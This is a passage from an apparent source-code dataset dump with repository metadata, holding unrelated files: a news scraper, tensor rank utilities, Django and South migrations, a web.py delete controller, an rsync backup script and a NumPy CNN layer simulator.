# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,0,1,1]
# ]
topology = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0],
[0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0],
[0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
]
|
[
"val.owczarek@gmail.com"
] |
val.owczarek@gmail.com
|
c92f83856a460fbd76d55aecce1634bc80da397a
|
77f7d3c94a696f02249440d24f099baafa5dd499
|
/g1scraper/scrap.py
|
4ede4acdf1861d41ef8a9dc91038488418d69be1
|
[
"Apache-2.0"
] |
permissive
|
schneider8357/g1scraper
|
eabe85fc5907204fa744559aa4ad34b93f3c6e3c
|
a756c652ed121a7f7109cbdaec5d11f5dd277c0c
|
refs/heads/main
| 2023-06-25T10:31:13.445238
| 2021-08-03T15:26:18
| 2021-08-03T15:26:18
| 392,109,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,060
|
py
|
"""Funcoes de scraping."""
import collections
import json
from bs4 import BeautifulSoup
import requests
def get_closing_bracket(string, indice_inicio):
"""Retorna o indice da '}' correspondente a '{' no indice recebido."""
if string[indice_inicio] != '{':
raise ValueError("String invalida")
deque = collections.deque()
for atual in range(indice_inicio, len(string)):
if string[atual] == '}' and string[atual-1] != '\\':
deque.popleft()
elif string[atual] == '{' and string[atual-1] != '\\':
deque.append(string[indice_inicio])
if not deque:
return atual # O '}' correpondente foi encontrado
raise ValueError("String invalida")
def get_noticias(url):
    """Return the news items, each with a title and a subtitle, in a list."""
    pagina = requests.get(url)
    soup = BeautifulSoup(pagina.text, 'html.parser')
    lista_noticias = []
    # Collect news items from the HTML
    for noticia in soup.find_all(class_="feed-post-body"):
        titulo = noticia.find(class_="feed-post-link")
        if titulo is None or titulo.contents is None:
            continue
        subtitulo = noticia.find(class_="feed-post-body-resumo")
        noticia = dict(titulo=titulo.contents[0], subtitulo=None)
        if subtitulo is not None:
            noticia["subtitulo"] = subtitulo.contents[0]
        lista_noticias.append(noticia)
    # Collect news items from the JSON embedded in the page's JavaScript
    feed = str(soup.find(class_="fore-posts-setted"))
    indice_chave = feed.find('{"')  # the JSON usually starts at "config"
    json_feed = feed[indice_chave : get_closing_bracket(feed, indice_chave)+1]
    dict_feed = json.loads(json_feed)
    for noticia in dict_feed["forePosts"] + dict_feed["items"]:
        if noticia["type"] in ("materia", "cobertura"):
            lista_noticias.append(
                {
                    "titulo": noticia["content"]["title"],
                    "subtitulo": noticia["content"].get("summary")
                }
            )
    return lista_noticias
|
[
"schneider8357@hotmail.com"
] |
schneider8357@hotmail.com
|
07be42846ea3adc4c1fcc1067837e0394309c7c8
|
968003c0336733ad45ccedbdce23b51a4df89825
|
/hottbox/rank/rank_estimation.py
|
f4f5795d89d2884c57d3fe690bc3c3773553ac41
|
[
"Apache-2.0"
] |
permissive
|
hottbox/hottbox
|
0167ed079ba9608c6c1b3366bc522dabd824075f
|
26580018ec6d38a1b08266c04ce4408c9e276130
|
refs/heads/develop
| 2020-03-07T05:36:06.008704
| 2020-01-31T12:47:52
| 2020-01-31T12:47:52
| 127,300,555
| 175
| 25
|
Apache-2.0
| 2020-01-31T12:54:16
| 2018-03-29T14:07:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
import numpy as np
from ..core.structures import Tensor
from ..algorithms.decomposition.cpd import CPD
def rankest(tensor, rank_range, epsilon=10e-3, verbose=False):
""" Estimate the optimal Kruskal rank of a tensor
Parameters
----------
tensor : Tensor
        Multi-dimensional data whose Kruskal rank is to be estimated
rank_range : list[int]
List of rank values to be tested
epsilon : float
Threshold for the relative error of approximation.
verbose : bool
Enable verbose output
Returns
-------
optimal_rank : tuple
Optimal Kruskal rank. For consistency, the type of the returned value is tuple
"""
if not isinstance(rank_range, list):
raise TypeError("The `rank_range` should be passed as a list of integers")
if not all(isinstance(value, int) for value in rank_range):
raise TypeError("The `rank_range` should consist of integers only")
cpd = CPD(verbose=False)
rel_error = []
for rank in rank_range:
cpd.decompose(tensor=tensor, rank=(rank,))
rel_error.append(cpd.cost[-1])
if verbose:
print('Rank = {}, Approximation error = {}'.format((rank,), cpd.cost[-1]))
if rel_error[-1] <= epsilon:
break
# Reset cost value for cpd. Should work even without it
cpd.cost = []
optimal_value = rank_range[rel_error.index(min(rel_error))]
optimal_rank = (optimal_value,)
return optimal_rank
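# Illustrative usage sketch (hypothetical shapes and rank range, not from the
# original file; the Tensor constructor call is an assumption):
# tensor = Tensor(np.random.rand(4, 5, 6))
# optimal_rank = rankest(tensor, rank_range=[1, 2, 3], verbose=True)  # e.g. (2,)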
def mlrank(tensor):
""" Calculate the multi-linear rank of a tensor
Parameters
----------
tensor : Tensor
        Multidimensional data whose multi-linear rank is to be computed
Returns
-------
ml_rank : tuple
Multi-linear rank
"""
# TODO: implement setting a threshold for singular values
order = tensor.order
ml_rank = [np.linalg.matrix_rank(tensor.unfold(mode=i, inplace=False).data) for i in range(order)]
ml_rank = tuple(ml_rank)
return ml_rank
|
[
"ilyakisil@gmail.com"
] |
ilyakisil@gmail.com
|
906140f5f9e9984a384bf2df06111b3814945311
|
643293536a8e09d05ee7df0da7a5a19369331f7e
|
/kindred_api/migrations/0003_remove_user_ig_token_expiry.py
|
8ae9e09e54d9a7f4995482614d0ce6a2393211ea
|
[] |
no_license
|
williamflaherty/kindred-api
|
1caa53a7f4acfdd23fd5b6d8656cc40394ad94a3
|
7110290a0d7b3aed272d4125f38eed366b415d01
|
refs/heads/master
| 2021-03-22T04:36:34.401632
| 2015-07-31T12:22:44
| 2015-07-31T12:22:44
| 39,611,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('kindred_api', '0002_auto_20150725_2011'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='ig_token_expiry',
),
]
|
[
"william.flaherty@gmail.com"
] |
william.flaherty@gmail.com
|
80a10e59342491b0f719f60ab2dabcaa09b7a8af
|
c123929d263042368ecab95d0efc791b084cc5ef
|
/exambook/asgi.py
|
7a9b6dab347618e406f847de2195985a7c9c9f24
|
[] |
no_license
|
mufazzalshokh/examboook
|
6b05232c47bd90b7191fd1c1b70a9573958e9704
|
7c70e5338a1cf4e8ea73622bd645c3c5a3f7fba3
|
refs/heads/master
| 2023-08-15T00:08:43.170106
| 2021-09-22T19:59:34
| 2021-09-22T19:59:34
| 385,854,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
"""
ASGI config for exambook project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'exambook.settings')
application = get_asgi_application()
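# Example (an assumption, not part of the original file): the application can be
# served with an ASGI server, e.g. `uvicorn exambook.asgi:application`.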
|
[
"zafarberdinazarov@Zafars-MacBook-Air.local"
] |
zafarberdinazarov@Zafars-MacBook-Air.local
|
648342a399665026c92a81498c91443f2eea80e2
|
9a05de245f3d87a731a44f47a1c316d3fe0d996b
|
/src/paloma/migrations/0011_auto__chg_field_mailbox_user.py
|
b7414063ade935c0e278c011b6e13bde31cc2445
|
[
"BSD-2-Clause"
] |
permissive
|
harajuku-tech/paloma
|
4c3651711d76b0df86692cf45b1bced221b8cc77
|
5be6ac7724ec0cabe5390b7018112f41fdec7581
|
refs/heads/master
| 2021-01-10T22:04:11.898174
| 2012-09-18T02:55:21
| 2012-09-18T02:55:21
| 3,616,369
| 0
| 1
| null | 2012-09-17T06:02:54
| 2012-03-04T05:56:51
|
Python
|
UTF-8
|
Python
| false
| false
| 10,049
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Mailbox.user'
db.alter_column('paloma_mailbox', 'user_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True))
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'Mailbox.user'
raise RuntimeError("Cannot reverse this migration. 'Mailbox.user' and its values cannot be restored.")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'paloma.alias': {
'Meta': {'object_name': 'Alias'},
'address': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'alias': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailbox': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {})
},
'paloma.domain': {
'Meta': {'object_name': 'Domain'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'backupmx': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maxquota': ('django.db.models.fields.BigIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'quota': ('django.db.models.fields.BigIntegerField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'transport': ('django.db.models.fields.CharField', [], {'max_length': '765'})
},
'paloma.group': {
'Meta': {'unique_together': "(('owner', 'name'), ('owner', 'symbol'))", 'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'symbol': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
},
'paloma.journal': {
'Meta': {'object_name': 'Journal'},
'dt_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_jailed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'recipient': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'text': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'paloma.mailbox': {
'Meta': {'object_name': 'Mailbox'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bounces': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['paloma.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'paloma.message': {
'Meta': {'object_name': 'Message'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailbox': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Mailbox']"}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Schedule']"}),
'text': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'})
},
'paloma.operator': {
'Meta': {'object_name': 'Operator'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'paloma.owner': {
'Meta': {'object_name': 'Owner'},
'domain': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'forward_to': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'paloma.schedule': {
'Meta': {'object_name': 'Schedule'},
'dt_start': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'forward_to': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['paloma.Group']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['paloma.Owner']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '24', 'db_index': 'True'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '101'}),
'task': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'max_length': '100'})
}
}
complete_apps = ['paloma']
|
[
"gmail@hdknr.com"
] |
gmail@hdknr.com
|
3f420e13c93c7aa89a8a063eca9f36043e5b52b1
|
4c41163cb921215f0d089f0e485103a621b6990b
|
/cmdr/cmdp/views.py
|
44546d5fec1b9eb5da145cdc5e9a938360b98c44
|
[] |
no_license
|
haman1/CRUD
|
582a1858c5cab370b0283b33f5c3f9814db0ebe3
|
922cbd9cf5536ce56c83cee053f51ee0d891b73b
|
refs/heads/master
| 2022-07-16T20:47:47.092695
| 2020-05-13T17:05:04
| 2020-05-13T17:05:04
| 263,691,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
from django.views.generic import ListView
# Create your views here.
from .models import Cmdr
class HomePageView(ListView):
model = Cmdr
template_name = 'home.html'
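# Hedged sketch (assumed URLconf wiring, not part of the original file):
# from django.urls import path
# from .views import HomePageView
# urlpatterns = [path('', HomePageView.as_view(), name='home')]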
|
[
"ombasaherman@gmail.com"
] |
ombasaherman@gmail.com
|
574e9a3ede31b2a2ec1ea8f1f6ed416baced133d
|
f26233042850800454406617fa2eb9b7669364f8
|
/MIsim/compute.py
|
2a9888472c65ef9b857a5789cc1d41ab39a4be06
|
[
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
iniverno/MIsim
|
69144f9669d00429da5c396ebf95dc9c21f886b7
|
c37ab10c19cd009bf4a916e88c916e4f2e5321ba
|
refs/heads/master
| 2021-01-10T09:47:12.746751
| 2016-02-04T22:23:04
| 2016-02-04T22:23:04
| 51,109,803
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,536
|
py
|
##################################################################################3
#
# Jorge Albericio, 2015
# jorge@ece.utoronto.ca
#
##################################################################################
import chunk
import numpy as np
import math
# in:
# data : numpy 3D ndarray of dimensions i * Wx * Wy, i=# input features, Wx=Wy= size of input
# filters: a list with two elements, we will use the field "data" of both,
# filters[0].data = numpy 4D ndarray of dimensions N * i * Fx * Fy with the filter values
# filters[1].data = numpy 1D vector with the N biases
# N = # filters, Fx=Fy= filter size
def computeConvolutionalLayer(data, filters, stride, padding, group):
weights = filters[0].data
biases = filters[1].data
N = weights.shape[0]
i = weights.shape[1]
Fx = weights.shape[2]
Fy = weights.shape[3]
Ix = data.shape[1]
Iy = data.shape[2]
if padding != 0:
data = adjustDataPadding(data, padding)
Ix = data.shape[1]
Iy = data.shape[2]
assert weights.shape[1]*group==data.shape[0], "#filters (%d) is not equal to #input features (%d)" %(weights.shape[1], data.shape[0])
assert Ix==Iy, "Input width (%d) is not equal to Input height (%d)" %(data.shape[1], data.shape[2])
assert Fx==Fy, "Filter width (%d) is not equal to Filter height (%d)" %(Fx, Fy)
output = np.zeros((N, (Ix-Fx)/stride+1, (Iy-Fy)/stride+1))
outPosX = 0
for posInputX in range(0, Ix-Fx+1, stride):
outPosY = 0
        print(posInputX)  # progress trace
for posInputY in range(0, Iy-Fy+1, stride):
for cntFilter in range(N): #for each filter we are going to calculate the convolution of the filter at the particular x,y position
# This implementation will work as long as group is 1 or 2, IT WON'T WORK FOR OTHER VALUES Of GROUP
if cntFilter < N/group:
output[cntFilter, outPosY, outPosX] = computeWindow(weights[cntFilter], data[:(data.shape[0]/group), posInputY:posInputY+Fy, posInputX:posInputX+Fx])
else:
output[cntFilter, outPosY, outPosX] = computeWindow(weights[cntFilter], data[(data.shape[0]/group):, posInputY:posInputY+Fy, posInputX:posInputX+Fx])
output[cntFilter, outPosY, outPosX] += biases[cntFilter]
outPosY += 1
outPosX += 1
return output
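# Illustrative usage sketch (hypothetical shapes and a stand-in filter holder,
# not from the original file):
# class _Blob(object): pass
# w, b = _Blob(), _Blob()
# w.data = np.random.rand(4, 3, 3, 3)  # 4 filters over 3 input features, 3x3 kernels
# b.data = np.zeros(4)                 # one bias per filter
# out = computeConvolutionalLayer(np.random.rand(3, 8, 8), [w, b], stride=1, padding=0, group=1)
# out.shape  # -> (4, 6, 6)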
def computeWindow(filter, data):
return np.sum(filter*data)
# this is simply an implementation of the previous function but using loops
def computeWindowLoops(filter, data):
aux = 0
for posFilterX in range(filter.shape[1]):
for posFilterY in range(filter.shape[2]):
for posFilterI in range(filter.shape[0]):
aux += filter[posFilterI][posFilterX][posFilterY] * \
data[posFilterI][posFilterX][posFilterY]
return aux
def adjustDataPadding(data, padding):
assert padding != 0, "Padding is zero"
aux = np.zeros((data.shape[0], data.shape[1] + 2*padding, data.shape[2] + 2*padding))
aux[:, padding:-padding, padding:-padding] = data
return aux
def computeMaxPoolLayer(data, filterSize, stride, padding):
    if padding != 0: data = adjustDataPadding(data, padding)
Ix = data.shape[1]
Iy = data.shape[2]
output = np.zeros((data.shape[0], (Ix-filterSize)/stride+1, (Iy-filterSize)/stride+1))
outPosX = 0
for posInputX in range(0, Ix - filterSize + 1, stride):
outPosY = 0
for posInputY in range(0, Iy - filterSize + 1, stride):
for cntFeature in range(0, data.shape[0]):
output[cntFeature, outPosY, outPosX] = np.max(data[cntFeature, posInputY:posInputY+filterSize, posInputX:posInputX+filterSize])
outPosY += 1
outPosX +=1
return output
# It computes a Local Response Normalization Layer
# for each element in the data array, it uses an auxiliar function to compute the proper value
# return: a matrix with the values after applying the function in the input data
def computeLRNLayer(data, size, alpha, beta):
aux = np.zeros(data.shape)
for posX in range(data.shape[1]):
for posY in range(data.shape[2]):
for posI in range(data.shape[0]):
aux[posI, posY, posX] = computePosLRN(data, posX, posY, posI, size, alpha, beta)
return aux
# it computes the LocalResponse normalization at a particular position
# it is defined by the equation result = data[i,y,x] / pow(1+a/size*sum(data[i-2:i+2, y, x]), b)
# data: complete input data
# x,y,i: position
# size: number of positions in the i dimension to take into account
# a, b: paramemeters in the equation
def computePosLRN(data, x, y, i, size, a, b):
value = 0.0
for cnt in range(-(size/2), size/2 + 1):
pos = i + cnt
if pos >= 0 and pos < data.shape[0]:
value += data[pos, y, x]**2
value = math.pow((1 + a/float(size) * value), b)
return data[i,y,x] / value
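# Sanity check (hypothetical): with a = 0 the denominator is pow(1, b) = 1,
# so computePosLRN returns data[i, y, x] unchanged.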
def computeSoftmaxLayer(x):
e_x = np.exp(x - np.max(x))
out = e_x / e_x.sum()
return out
def computeDropoutLayer(data, dropoutFactor):
return data * dropoutFactor
def computeReLULayer(data):
    aux = np.copy(data)
    for i, e in enumerate(aux.flat):
        if e < 0: aux.flat[i] = 0
    return aux
# Loop-based alternative, equivalent to computeReLULayer (this code was
# unreachable after the return above, so it is split out as its own function)
def computeReLULayerLoops(data):
    aux = np.copy(data)
    for posX in range(data.shape[1]):
        for posY in range(data.shape[2]):
            for posI in range(data.shape[0]):
                if data[posI, posY, posX] < 0: aux[posI, posY, posX] = 0.0
                else: aux[posI, posY, posX] = data[posI, posY, posX]
    return aux
def computeFullyConnected(data, filters):
filters = filters[0].data
aux = np.zeros((filters.shape[0]))
for i in range(filters.shape[0]):
aux[i] = np.sum(filters[i] * data.flatten())
return aux
|
[
"jorge.albericio@gmail.com"
] |
jorge.albericio@gmail.com
|
fa93d85569c12cb7aa7140fff0a8c35bf8da0a13
|
85b958530cbf8a77c5766f88eb8a6590bdf1ad56
|
/application/controllers/area_atencion/delete.py
|
b554fddf5f50405484aa2c5594a37eac73d00faa
|
[] |
no_license
|
charliecarmona44/tut2018
|
1e1ed8c56ebf6b2df09b59a5010d8ebbc17d433e
|
54c796a4bdda29a9c5be371de55804ccc4eb9af8
|
refs/heads/master
| 2022-03-13T21:00:05.623926
| 2019-07-19T15:53:18
| 2019-07-19T15:53:18
| 197,802,686
| 0
| 0
| null | 2019-10-31T08:23:54
| 2019-07-19T15:51:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,018
|
py
|
import config
import hashlib
import app
class Delete:
def __init__(self):
pass
    '''
    def GET(self, id_area_atencion, **k):
        if app.session.loggedin is True:  # validate that the user is logged in
            # session_username = app.session.username
            session_privilege = app.session.privilege  # get the session privilege
            if session_privilege == 0:  # admin user
                return self.GET_DELETE(id_area_atencion)  # call the GET_DELETE function
            elif session_privilege == 1:  # guest user
                raise config.web.seeother('/guess')  # render guess.html
        else:  # the user is not logged in
            raise config.web.seeother('/login')  # render login.html
    def POST(self, id_area_atencion, **k):
        if app.session.loggedin is True:  # validate that the user is logged in
            # session_username = app.session.username
            session_privilege = app.session.privilege
            if session_privilege == 0:  # admin user
                return self.POST_DELETE(id_area_atencion)  # call the POST_DELETE function
            elif session_privilege == 1:  # guest user
                raise config.web.seeother('/guess')  # render guess.html
        else:  # the user is not logged in
            raise config.web.seeother('/login')  # render login.html
    @staticmethod
    def GET_DELETE(id_area_atencion, **k):
    @staticmethod
    def POST_DELETE(id_area_atencion, **k):
    '''
    def GET(self, id_area_atencion, **k):
        message = None  # error message
        id_area_atencion = config.check_secure_val(str(id_area_atencion))  # HMAC id_area_atencion validation
        result = config.model.get_area_atencion(int(id_area_atencion))  # search id_area_atencion
        result.id_area_atencion = config.make_secure_val(str(result.id_area_atencion))  # apply HMAC to id_area_atencion
        return config.render.delete(result, message)  # render delete.html with the record data
    def POST(self, id_area_atencion, **k):
        form = config.web.input()  # get form data
        form['id_area_atencion'] = config.check_secure_val(str(form['id_area_atencion']))  # HMAC id_area_atencion validation
        result = config.model.delete_area_atencion(form['id_area_atencion'])  # delete the area_atencion record
        if result is None:  # delete error
            message = "El registro no se puede borrar"  # error message
            id_area_atencion = config.check_secure_val(str(id_area_atencion))  # HMAC validation
            result = config.model.get_area_atencion(int(id_area_atencion))  # get id_area_atencion data
            result.id_area_atencion = config.make_secure_val(str(result.id_area_atencion))  # apply HMAC to id_area_atencion
            return config.render.delete(result, message)  # render delete.html again
        else:
            raise config.web.seeother('/area_atencion')  # redirect back to the area_atencion list
|
[
"53064537+charliecarmona44@users.noreply.github.com"
] |
53064537+charliecarmona44@users.noreply.github.com
|
4765bc6a151dd2ace0a1caa820041abaa0e3233f
|
1bccf0b1374dcfddfc3e320fd5b6af499334df2d
|
/data/rsync.py
|
904679ac972e2e9f6646d7eed2179b1a3253946a
|
[
"Unlicense"
] |
permissive
|
chebee7i/twitter
|
6b245f5a7b7510089b62d48567e6208e1fe8a1db
|
ec1d772c3ef7d2288ac8051efb8637378f3ec195
|
refs/heads/master
| 2021-01-01T16:25:13.242941
| 2015-06-24T19:39:24
| 2015-06-24T19:39:24
| 23,846,593
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,182
|
py
|
"""
Script to backup Twitter data using rsync.
A lockfile ensures that this script does not run until the previous run has
finished.
"""
from __future__ import print_function
import errno
import fcntl
import glob
import os
import subprocess
import sys
import time
import configparser
config = configparser.ConfigParser()
config.read('../project.cfg')
BACKUP_PATH = config['Locations']['BACKUP_PATH']
MONGO_PREFIX = config['Prefixes']['MONGO_PREFIX']
def rsync(path=None):
if path is None:
path = BACKUP_PATH
print()
print("-----")
subprocess.call('date')
cmd = 'rsync --progress -zhtr *.gz *.log {0}* {1}'
cmd = cmd.format(MONGO_PREFIX, path)
print(cmd)
subprocess.call(cmd, shell=True)
def main():
with open('.lock_rsync', 'w') as f:
try:
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except IOError as e:
if e.errno == errno.EAGAIN:
msg = '[{0}] rsync script already running.\n'
msg = msg.format(time.strftime('%c'))
sys.stderr.write(msg)
sys.exit(-1)
raise
rsync()
if __name__ == '__main__':
main()
|
[
"chebee7i@gmail.com"
] |
chebee7i@gmail.com
|
86b7e9291c8130f09049ae542b9f23a1ef115a28
|
50f239890cf2708f9e2f9fa29216aeaea360eb31
|
/tests/examples/inconsistent_pipeline.py
|
d41f71045fab62e79b38a4af27dfb509993c53f0
|
[
"MIT"
] |
permissive
|
jbn/modpipe
|
485b18cf13290724c2b282b849ca4ac7b2d0f03e
|
06e182704d4582ab41ce92f5ae1a908874bf60e2
|
refs/heads/master
